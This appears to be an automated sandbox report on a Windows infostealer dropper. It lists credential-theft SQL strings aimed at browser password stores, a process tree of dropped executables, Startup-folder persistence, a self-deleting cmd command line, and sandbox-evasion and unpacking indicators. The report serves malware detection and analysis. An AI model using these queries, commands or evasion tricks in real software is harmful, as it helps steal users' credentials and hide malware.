              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeBinary or memory string: SELECT a11, a102 FROM nssPrivate;
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeBinary or memory string: SELECT item1, item2 FROM metadata WHERE id = 'password';
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeBinary or memory string: SELECT formSubmitURL, encryptedUsername, encryptedPassword FROM moz_logins;
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeVirustotal: Detection: 30%
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeReversingLabs: Detection: 33%
              Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe'
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeProcess created: C:\Users\user\AppData\Local\Temp\Murano.exe 'C:\Users\user\AppData\Local\Temp\Murano.exe'
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk & timeout 3 & del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe'
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeProcess created: C:\Users\user\AppData\Local\Temp\New Feature\4.exe C:\Users\user\AppData\Local\Temp\New Feature\4.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeProcess created: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
              Source: C:\Windows\SysWOW64\makecab.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeProcess created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
              Source: C:\Windows\SysWOW64\makecab.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
              Source: C:\Windows\SysWOW64\makecab.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
              Source: C:\Windows\SysWOW64\makecab.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
              Source: C:\Windows\SysWOW64\makecab.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe 'C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe'
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
              Source: C:\Windows\SysWOW64\makecab.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
              Source: C:\Windows\SysWOW64\makecab.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Windows\System32\cmd.exe < Scoprirvi.eps
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeProcess created: C:\Users\user\AppData\Local\Temp\Murano.exe 'C:\Users\user\AppData\Local\Temp\Murano.exe'
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk & timeout 3 & del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe'
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeProcess created: C:\Users\user\AppData\Local\Temp\New Feature\4.exe C:\Users\user\AppData\Local\Temp\New Feature\4.exe
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeProcess created: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeProcess created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Windows\System32\cmd.exe < Scoprirvi.eps
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{515980c3-57fe-4c1e-a561-730dd256ab98}\InprocServer32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll

              Data Obfuscation:

              barindex
              Detected unpacking (changes PE section rights)Show sources
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeUnpacked PE file: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack .text:ER;.data:W;.hejus:W;.tiyovo:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeUnpacked PE file: 16.2.4.exe.400000.0.unpack .text:ER;.data:W;.yiku:W;.padozoc:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeUnpacked PE file: 22.2.SmartClock.exe.400000.0.unpack .text:ER;.data:W;.yiku:W;.padozoc:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeUnpacked PE file: 25.2.SmartClock.exe.400000.0.unpack .text:ER;.data:W;.yiku:W;.padozoc:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeUnpacked PE file: 33.2.SmartClock.exe.400000.0.unpack .text:ER;.data:W;.yiku:W;.padozoc:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
              Detected unpacking (overwrites its own PE header)Show sources
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeUnpacked PE file: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeUnpacked PE file: 16.2.4.exe.400000.0.unpack
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeUnpacked PE file: 22.2.SmartClock.exe.400000.0.unpack
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeUnpacked PE file: 25.2.SmartClock.exe.400000.0.unpack
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeUnpacked PE file: 33.2.SmartClock.exe.400000.0.unpack
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeCode function: 13_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,
              Source: vpn.exe.13.drStatic PE information: real checksum: 0x11b384 should be: 0x11fc4a
              Source: UAC.dll.13.drStatic PE information: real checksum: 0x0 should be: 0xde12
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeStatic PE information: section name: .hejus
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeStatic PE information: section name: .tiyovo
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeStatic PE information: section name: .new
              Source: 4.exe.13.drStatic PE information: section name: .yiku
              Source: 4.exe.13.drStatic PE information: section name: .padozoc
              Source: 4.exe.13.drStatic PE information: section name: .new
              Source: SmartClock.exe.16.drStatic PE information: section name: .yiku
              Source: SmartClock.exe.16.drStatic PE information: section name: .padozoc
              Source: SmartClock.exe.16.drStatic PE information: section name: .new
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_0041D1BC push eax; retn 0041h
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_0041CA40 pushad ; retn 0041h
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_0041BB1C pushad ; retn 0041h
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_0040A446 push ecx; ret
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_004075A2 push eax; mov dword ptr [esp], ecx
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F577F2 push eax; mov dword ptr [esp], ecx
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F6B76C pushad ; retn 0041h
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F5A696 push ecx; ret
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F6C690 pushad ; retn 0041h
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F6CE0C push eax; retn 0041h
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_004186D0 push eax; ret
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_0041D1BC push eax; retn 0041h
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_0041CA40 pushad ; retn 0041h
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_0041BB1C pushad ; retn 0041h
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_0040A446 push ecx; ret
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_004075A2 push eax; mov dword ptr [esp], ecx
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A077F2 push eax; mov dword ptr [esp], ecx
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A1B76C pushad ; retn 0041h
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A1C690 pushad ; retn 0041h
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A0A696 push ecx; ret
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A1CE0C push eax; retn 0041h
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_0041D1BC push eax; retn 0041h
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_0041CA40 pushad ; retn 0041h
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_0041BB1C pushad ; retn 0041h
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_0040A446 push ecx; ret
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_004075A2 push eax; mov dword ptr [esp], ecx
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059D77F2 push eax; mov dword ptr [esp], ecx
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059EB76C pushad ; retn 0041h
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059DA696 push ecx; ret
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059EC690 pushad ; retn 0041h
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059ECE0C push eax; retn 0041h
              Source: initial sampleStatic PE information: section name: .text entropy: 7.87132737384
              Source: initial sampleStatic PE information: section name: .text entropy: 7.34669656033
              Source: initial sampleStatic PE information: section name: .text entropy: 7.34669656033
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0040C561 Sleep,Sleep,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,ExitProcess,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,ShellExecuteW,ExitProcess,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeFile created: C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\UAC.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeFile created: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile created: C:\Users\user\AppData\Local\Temp\Murano.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeFile created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeFile created: C:\Users\user\AppData\Local\Temp\New Feature\4.exeJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_00409DF0 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetPrivateProfileStringW,CreateFileW,CreateFileW,CloseHandle,CloseHandle,CreateFileW,CloseHandle,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CopyFileW,CopyFileW,CopyFileW,GetFileAttributesW,GetFileAttributesW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,GetFileAttributesW,WideCharToMultiByte,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnkJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnkJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              barindex
              Delayed program exit foundShow sources
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_004011E2 Sleep,ExitProcess,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F51432 Sleep,ExitProcess,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_004011E2 Sleep,ExitProcess,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A01432 Sleep,ExitProcess,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_004011E2 Sleep,ExitProcess,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059D1432 Sleep,ExitProcess,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeRegistry key enumerated: More than 346 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe TID: 5856Thread sleep time: -102511s >= -30000s
              Source: C:\Windows\System32\conhost.exe TID: 1400Thread sleep count: 40 > 30
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe TID: 3152Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exe TID: 2896Thread sleep count: 34 > 30
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0040F1D0 FindFirstFileW,FindNextFileW,FindClose,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_00414650 ExpandEnvironmentStringsW,FindFirstFileW,FindFirstFileW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0041469B FindFirstFileW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CopyFileW,ExpandEnvironmentStringsW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_00416AC0 FindFirstFileW,FindFirstFileW,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_00416C3A CopyFileW,ExpandEnvironmentStringsW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0040F259 FindFirstFileW,FindNextFileW,FindClose,
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeCode function: 13_2_00406301 FindFirstFileW,FindClose,
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeCode function: 13_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_0040F64C FindFirstFileExW,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F5F89C FindFirstFileExW,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_00403117 FindFirstFileW,FindClose,SetLastError,CompareFileTime,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_00408FA7 ??2@YAPAXI@Z,FindFirstFileW,FindClose,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_00402A0B FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_00402B28 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_0040F64C FindFirstFileExW,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A0F89C FindFirstFileExW,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_0040F64C FindFirstFileExW,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059DF89C FindFirstFileExW,
